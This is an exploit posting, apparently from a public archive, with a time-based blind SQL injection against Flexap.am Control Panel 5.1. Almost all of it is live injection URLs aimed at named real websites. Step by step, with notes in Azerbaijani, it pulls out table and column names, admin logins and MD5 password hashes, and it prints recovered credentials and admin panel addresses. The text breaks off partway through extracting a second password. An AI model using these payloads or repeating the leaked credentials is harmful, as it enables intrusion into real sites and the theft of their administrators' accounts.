exploit the possibilities

Flexap.am Control Panel 5.1 Blind SQL Injection

Flexap.am Control Panel 5.1 Blind SQL Injection
Posted Sep 3, 2012
Authored by Akastep

Flexap.am Control Panel version 5.1 suffer from a remote blind SQL injection vulnerability. Note that this finding houses site-specific data.

tags | exploit, remote, sql injection
MD5 | 6a41a6c372908ee71546fd95c95ef811

Flexap.am Control Panel 5.1 Blind SQL Injection

Change Mirror Download
=====================================================
Vulnerable software: Control Panel version 5.1
Vendor: http://www.flexap.am/
Vuln type: Blind SQL Injection
Software License: Commercial
Software: Control Panel version 5.1
Discovered and Exploited in Wild
=====================================================
Dork: Developed by flexap.am

=====================================================


************** FOR OUR BRO RAMIL SEFEROV! ************************
@OPERATION BY AZERBAIJAN BLACK HATZ: *WIPEN'EM purgens!*
I'M=> AkaStep<= RESPONSIBLE FOR EVERYTHING IN THIS advisory=
********************** REALLY! ********************************************
******************ENJOY MAXIMALLY**************************************



=====================================================




http://dua.am/cms <=Admin panel

Real exploitation example:

Time Based Always RuleZ!

//TRUE

http://www.dua.am/am/news/50'or sleep(10)-- and 5='5/

cms: http://www.dua.am/



//TRUE

www.dua.am/am/news/50' or (select if(substr(column_name,1,13)='ulist_login',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 3,1)-- AnD 5='5




logini cekek:


http://www.dua.am/am/news/50%27%20or%20%28select%20if%28substr%28%60ulist_login%60,1,1%29=%27a%27,sleep%281%29,0%29%20from%20ulist%20limit%201%29--%20AnD%20%205=%275

1-ci simvol:


a

//TRUE
http://www.dua.am/am/news/50' or (select if(substr(`ulist_login`,1,1)='a',sleep(1),0) from ulist limit 1)-- AnD 5='5



2-ci simvol: d

http://www.dua.am/am/news/50' or (select if(substr(`ulist_login`,2,1)='d',sleep(1),0) from ulist limit 1)-- AnD 5='5


3-cu simvol: m

http://www.dua.am/am/news/50' or (select if(substr(`ulist_login`,3,1)='m',sleep(1),0) from ulist limit 1)-- AnD 5='5


4-cu simvol: d


http://www.dua.am/am/news/50' or (select if(substr(`ulist_login`,4,1)='d',sleep(1),0) from ulist limit 1)-- AnD 5='5



5-ci simvol: u


http://www.dua.am/am/news/50' or (select if(substr(`ulist_login`,5,1)='u',sleep(1),0) from ulist limit 1)-- AnD 5='5


6-ci simvol: a


http://www.dua.am/am/news/50' or (select if(substr(`ulist_login`,6,1)='a',sleep(1),0) from ulist limit 1)-- AnD 5='5


Login: admdua


//TRUE
http://www.dua.am/am/news/50' or (select if(substr(`ulist_login`,1,15)='admdua',sleep(1),0) from ulist limit 1)-- AnD 5='5




Passi cekmeye getdik!



Pass deyesen ele budur:D
http://www.dua.am/am/news/50' or (select if(substr(`ulist_password`,1,33)='9578f5aa427b07bdd3a8549f929a4e31',sleep(1),0) from ulist limit 1)-- AnD 5='5


pass: Massword


mogin:Massword

===================================================================

Next another Demo:


Adminka: http://mkuzak.am/cms/


//TRUE
http://www.mkuzak.am/am/news/85%27%20or%20sleep%2810%29--%20and%205=%275/



//TRUE
http://www.mkuzak.am/am/news-8%27%20or%20sleep%281%29--%20and%205=%275/



Developed by <a href="http://www.flexap.am"


Bele olmalidir:




http://www.mkuzak.am/am/news/1' or (select if(count(table_name)='10',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61)-- AnD 5='5


24 table varimizdir:

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(count(table_name)='24',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61)-- AnD 5='5


1-ci tablein adi 8 simvolluqdur:


//TRUE

Cekek


1-ci tablein adinin 1ci herfi: c


//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='c',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 1)-- AnD 5='5


2-ci simvolu (1-ci tablein adinin) : a


http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,2,1)='a',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 1)-- AnD 5='5

3-cu simvolu: t

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,3,1)='t',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 1)-- AnD 5='5



Category?

Yoxlayaq:

1-ci tablein adi: category
//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,12)='category',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 1)-- AnD 5='5



Ok indi qisaltmaga calisaq metodu:

pattern: adm
user

uzre:



http://www.mkuzak.am/am/news/1' or (select if(length(table_name)>'10',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 2,1)-- AnD 5='5


http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,3)='adm',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 1)-- AnD 5='5



adm uzre butun neticeler LIMIT offsetlerde hamisi FALSE

qaldi user uzre. Edit: Ele user uzre de netice falsedir butun cehdlerde.


cms uzre axtaraq.


(select if(substr(table_name,1,3)='acms',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 2,1)-- AnD 5='5


Alinmasa isimiz uzanir.




ele uzandida isimiz icini sikim!



2-ci table name: 6 simvol uzunluqludur:



http://www.mkuzak.am/am/news/1' or (select if(length(table_name)='6',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 2,1)-- AnD 5='5


Cekek bu sikilmisi de.


1-ci simvolu: c

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='c',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 2,1)-- AnD 5='5

2-ci simvolu: o

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,2,1)='o',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 2,1)-- AnD 5='5


config?

2ci table name config:

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,8)='config',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 2,1)-- AnD 5='5



=======================================================================
3-cu table name: 3 simvol:

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(length(table_name)='3',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 3,1)-- AnD 5='5

1-ci simvolu: f


//TRUE


http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='f',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 3,1)-- AnD 5='5



2-ci simvolu: a


http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,2,1)='a',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 3,1)-- AnD 5='5


3-cu simvolu: q

//TRUE


http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,3,1)='q',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 3,1)-- AnD 5='5


3-cu table name: faq

======================================================================


4-cu table name: 15 simvol uzunluqludur:




http://www.mkuzak.am/am/news/1' or (select if(length(table_name)='15',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 4,1)-- AnD 5='5


1-ci simvolu: f

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='f',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 4,1)-- AnD 5='5

2-ci simvolu:


a

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,2,1)='a',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 4,1)-- AnD 5='5


sikdirecek bu table
=======================================================================


//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='u',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD 5='5

u herfine nese verir.


10 simvolludur:


//TRUE


http://www.mkuzak.am/am/news/1' or (select if(length(table_name)='10',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD 5='5


1-ci simvolu: u

2-ci simvolu: l
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,2,1)='l',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD 5='5

3-cu simvolu: i

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,3,1)='i',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD 5='5

4-cu simvol: s

s

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,4,1)='s',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD 5='5


5-ci simvolu: t

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,5,1)='t',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD 5='5

6-ci simvol: _

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,6,1)='_',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD 5='5

7-ci simvol: t

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,7,1)='t',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD 5='5


8-ci simvol: y

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,8,1)='y',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD 5='5

9-cu simvol: p

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,9,1)='p',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD 5='5

10-ci simvol:

table_name: ulist_type

===================================================================================================================
novbeti table:
//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='u',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 22,1)-- AnD 5='5

Bu da
//TRUE


http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='u',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 21,1)-- AnD 5='5



Bu da

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='u',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 20,1)-- AnD 5='5


Bu da

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='u',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 19,1)-- AnD 5='5



============================= birinci herfi u olmaqla cemi 5 simvoldan ibaretdir. May be users?======================

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(length(table_name)='5',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 19,1)-- AnD 5='5


2-ci herfi: l

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,2,1)='l',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 19,1)-- AnD 5='5

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,6)='ulist',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 19,1)-- AnD 5='5


TABLE_NAME ulist

0x756C697374




http://www.mkuzak.am/am/news/1' or (select if(count(*)='1',sleep(1),0) from ulist)-- AnD 5='5



//TRUE

http://www.mkuzak.am/am/news/1' or (select if(count(*)='2',sleep(1),0) from ulist)-- AnD 5='5

Ola bilsin ele budur cms-in adminkasina girmek ucun table
2 yazi var orda

COlumnlarina baxaq gorek ne veziyyetdedir.



http://www.mkuzak.am/am/news/1' or (select if(count(column_name)='1',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374)-- AnD 5='5

ulist tableinda 8 column var:

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(count(column_name)='8',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374)-- AnD 5='5

1-ci column name: 8 simvoldan ibaretdir

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(length(column_name)='8',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1)-- AnD 5='5

ulist tableinda 1-ci colum namein 1-ci simvolu: u

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,1,1)='u',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1)-- AnD 5='5

2-ci simvolu: l

http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,2,1)='l',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1)-- AnD 5='5


3-cu simvolu: i


http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,3,1)='i',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1)-- AnD 5='5


4-cu simvolu: s

http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,4,1)='s',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1)-- AnD 5='5

5-ci simvolu: t

http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,5,1)='t',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1)-- AnD 5='5

6-ci simvol: _


http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,6,1)='_',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1)-- AnD 5='5


1-ci column name full sekilde:

ulist_id
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,1,12)='ulist_id',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1)-- AnD 5='5


column prefix ulist_ dir demeli:


//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,1,6)='ulist_',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1,1)-- AnD 5='5


Getdik bu sikilmis 2-ci columnu cekmeye:

name Uzunlugu 13 simvoldur:


//TRUE

http://www.mkuzak.am/am/news/1' or (select if(length(column_name)='13',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1,1)-- AnD 5='5



http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,7,1)='t',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1,1)-- AnD 5='5


hal hazirda bu sekildedir:

ulist_t



//TRUE


http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,8,1)='y',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1,1)-- AnD 5='5

hal hazirda bu sekildedir:

ulist_typeXXX


axira getmirem imho sikdirmelidir bu column name

Novbeti column blyaaaaaaaaaaaaaaaaaaaaaa:(



============================================

3-cu column:

10 simvoldur name length
http://www.mkuzak.am/am/news/1' or (select if(length(column_name)='10',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 2,1)-- AnD 5='5



//TRUE


http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,7,1)='n',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 2,1)-- AnD 5='5

ulist_n



//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,8,1)='a',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 2,1)-- AnD 5='5

ulist_na



//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,9,1)='m',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 2,1)-- AnD 5='5

ulist_nam






http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,10,1)='e',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 2,1)-- AnD 5='5


ulist_name


//TRUE


http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,1,11)='ulist_name',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 2,1)-- AnD 5='5


==============================================================


Novbeti column:

11 simvolludur column name length

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(length(column_name)='11',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 3,1)-- AnD 5='5


Prefixi: ulist_ (-6)

Offset 7 den baslanmalidir substr()-de


//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,1,13)='ulist_login',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 3,1)-- AnD 5='5

ulist_login



password-da cixsa sikmeye basliyardiq blyaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:(



Deyesen artiq duz tutmusam bunu:


http://www.mkuzak.am/am/news/1' or (select if(length(column_name)='14',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 4,1)-- AnD 5='5

Yeah!

Sikdik!

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,1,15)='ulist_password',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 4,1)-- AnD 5='5


ulist_password


Neyimiz var:

ulist table-i

hemin tableda:

ulist_login
ulist_password

columnlari


Basliyaq...




http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,1,15)='admin',sleep(1),0) from ulist limit 1)-- AnD 5='5



select length(`ulist_login`) from ulist limit 1


1-ci login name 9 simvoldan ibaretdir:

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(length(`ulist_login`)='9',sleep(1),0) from ulist limit 1)-- AnD 5='5


--------------------------------------------------------------------------------------------------------------------------------------------------------------
Loginin 1-ci simvolu: a

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,1,1)='a',sleep(1),0) from ulist limit 1)-- AnD 5='5



2ci simvolu: d

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,2,1)='d',sleep(1),0) from ulist limit 1)-- AnD 5='5

3cu simvol: m

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,3,1)='m',sleep(1),0) from ulist limit 1)-- AnD 5='5

4-cu simvol: m

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,4,1)='m',sleep(1),0) from ulist limit 1)-- AnD 5='5

5-ci simvol:


Login bu ola biler: admmkuzak


//TRUE


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,1,11)='admmkuzak',sleep(1),0) from ulist limit 1)-- AnD 5='5





Getdik passi firlatmaga...


Amma 1-ci sifrelenme algosunu yoxlayaq.

http://www.mkuzak.am/am/news/1' or (select if(length(`ulist_password`)='32',sleep(1),0) from ulist limit 1)-- AnD 5='5


//TRUE


MD5 SIFRELENME ALGOSU:

http://www.mkuzak.am/am/news/1' or (select if(length(`ulist_password`)='32',sleep(1),0) from ulist limit 1)-- AnD 5='5




http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,1,1)='0',sleep(1),0) from ulist limit 1)-- AnD 5='5




admmkuzak adli soska xacikin parolu:


================================================

1-ci simvol: 9


//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,1,1)='9',sleep(1),0) from ulist limit 1)-- AnD 5='5

================================================

2-ci simvol: 5


//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,2,1)='5',sleep(1),0) from ulist limit 1)-- AnD 5='5


================================================

3-cu simvol: 7


//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,3,1)='7',sleep(1),0) from ulist limit 1)-- AnD 5='5


================================================

4-cu simvol: 8

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,4,1)='8',sleep(1),0) from ulist limit 1)-- AnD 5='5


================================================

5-ci simvol: f

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,5,1)='f',sleep(1),0) from ulist limit 1)-- AnD 5='5



================================================

6-ci simvol: 5


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,6,1)='5',sleep(1),0) from ulist limit 1)-- AnD 5='5


================================================

7-ci simvol: a

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,7,1)='a',sleep(1),0) from ulist limit 1)-- AnD 5='5


================================================


8-ci simvol: a

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,8,1)='a',sleep(1),0) from ulist limit 1)-- AnD 5='5




================================================

9-cu simvol: 4


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,9,1)='4',sleep(1),0) from ulist limit 1)-- AnD 5='5



================================================

10-cu simvol: 2

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,10,1)='2',sleep(1),0) from ulist limit 1)-- AnD 5='5


================================================

11-ci simvol: 7

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,11,1)='7',sleep(1),0) from ulist limit 1)-- AnD 5='5

================================================

12-ci simvol: b (yoxla sonra)

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,12,1)='b',sleep(1),0) from ulist limit 1)-- AnD 5='5




================================================

13-cu simvol: 0

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,13,1)='0',sleep(1),0) from ulist limit 1)-- AnD 5='5

================================================

14-cu simvol: 7

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,14,1)='7',sleep(1),0) from ulist limit 1)-- AnD 5='5


================================================

15-ci simvol: b (yoxla sonra)


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,15,1)='b',sleep(1),0) from ulist limit 1)-- AnD 5='5


================================================

16-ci simvol: d

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,16,1)='d',sleep(1),0) from ulist limit 1)-- AnD 5='5


================================================


17-ci simvol: d


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,17,1)='d',sleep(1),0) from ulist limit 1)-- AnD 5='5


================================================


18-ci simvol: 3


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,18,1)='3',sleep(1),0) from ulist limit 1)-- AnD 5='5

================================================


19-cu simvol: a


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,19,1)='a',sleep(1),0) from ulist limit 1)-- AnD 5='5

================================================


20-ci simvol: 8

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,20,1)='8',sleep(1),0) from ulist limit 1)-- AnD 5='5


================================================

21-ci simvol: 5

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,21,1)='5',sleep(1),0) from ulist limit 1)-- AnD 5='5



================================================
yoxla sonra
22-ci simvol: 4

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,22,1)='4',sleep(1),0) from ulist limit 1)-- AnD 5='5

================================================


23-cu simvol: 9

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,23,1)='9',sleep(1),0) from ulist limit 1)-- AnD 5='5


================================================
yoxla sonra


24-cu simvol: f

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,24,1)='f',sleep(1),0) from ulist limit 1)-- AnD 5='5


================================================

25-ci simvol: 9


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,25,1)='9',sleep(1),0) from ulist limit 1)-- AnD 5='5


================================================


26-ci simvol: 2

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,26,1)='2',sleep(1),0) from ulist limit 1)-- AnD 5='5

================================================

27-ci simvol: 9


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,27,1)='9',sleep(1),0) from ulist limit 1)-- AnD 5='5

================================================
yoxla sonra
28-ci simvol: a


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,28,1)='a',sleep(1),0) from ulist limit 1)-- AnD 5='5

================================================

29-cu simvol: 4

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,29,1)='4',sleep(1),0) from ulist limit 1)-- AnD 5='5


================================================

30-cu simvol: e

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,30,1)='e',sleep(1),0) from ulist limit 1)-- AnD 5='5

================================================


31-ci simvol: 3


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,31,1)='3',sleep(1),0) from ulist limit 1)-- AnD 5='5



================================================

32-ci simvol: 1


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,32,1)='1',sleep(1),0) from ulist limit 1)-- AnD 5='5


================================================
Login: admmkuzak

MD5 HASH: 9578f5aa427b07bdd3a8549f929a4e31


PASS: Massword
Yoxlaya hashi:

//TRUE


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,1,33)='9578f5aa427b07bdd3a8549f929a4e31',sleep(1),0) from ulist limit 1)-- AnD 5='5


Blyaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa http://www.mkuzak.am/cms/ de deyir parol sehvdir:(


Belke role yoxdur bu userde?


2-ci user de olmalidir bu table da.


Variant yoxdur cekek:*(




Ikinci user name ucun:


http://www.mkuzak.am/am/news/1' or (select if(length(`ulist_login`)='5',sleep(1),0) from ulist limit 1,1)-- AnD 5='5




2-ci userin logininin

1-ci herfi:


m

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,1,1)='m',sleep(1),0) from ulist limit 1,1)-- AnD 5='5


2-ci herfi: o


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,2,1)='o',sleep(1),0) from ulist limit 1,1)-- AnD 5='5


3-cu herfi: g

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,3,1)='g',sleep(1),0) from ulist limit 1,1)-- AnD 5='5


4-cu herfi: i


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,4,1)='i',sleep(1),0) from ulist limit 1,1)-- AnD 5='5



5-ci simvol: n



http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,5,1)='n',sleep(1),0) from ulist limit 1,1)-- AnD 5='5



umumi username ikinci user ucun:


mogin

Yoxlayaq?


//TRUE


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,1,6)='mogin',sleep(1),0) from ulist limit 1,1)-- AnD 5='5




Passi getdik: Cekmeye yene blyaaaaaaaaaaaaaaaaa :*(


================================================

1-ci simvol: e


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,1,1)='e',sleep(1),0) from ulist limit 1,1)-- AnD 5='5


================================================

2-ci simvol: 7


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,2,1)='7',sleep(1),0) from ulist limit 1,1)-- AnD 5='5



================================================
yoxla sonra:
3-cu simvol: 9



http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,3,1)='9',sleep(1),0) from ulist limit 1,1)-- AnD 5='5



================================================

4-cu simvol: d


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,4,1)='d',sleep(1),0) from ulist limit 1,1)-- AnD 5='5



================================================

5-ci simvol: 2

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,5,1)='2',sleep(1),0) from ulist limit 1,1)-- AnD 5='5



================================================


yoxla mutlwq
6-ci simvol: f

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,6,1)='f',sleep(1),0) from ulist limit 1,1)-- AnD 5='5



================================================





7-ci simvol: 3

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,7,1)='3',sleep(1),0) from ulist limit 1,1)-- AnD 5='5





================================================
yoxla sonra

8-ci simvol: 1

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,8,1)='1',sleep(1),0) from ulist limit 1,1)-- AnD 5='5




================================================


9-cu simvol: 5


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,9,1)='5',sleep(1),0) from ulist limit 1,1)-- AnD 5='5


================================================
10-cu simvol: e


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,10,1)='e',sleep(1),0) from ulist limit 1,1)-- AnD 5='5


================================================

11-ci simvol: 9

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,11,1)='9',sleep(1),0) from ulist limit 1,1)-- AnD 5='5


================================================

12-ci simvol: 9

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,12,1)='9',sleep(1),0) from ulist limit 1,1)-- AnD 5='5



================================================

13-cu simvol: c

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,13,1)='c',sleep(1),0) from ulist limit 1,1)-- AnD 5='5



================================================

14-cu simvol: a


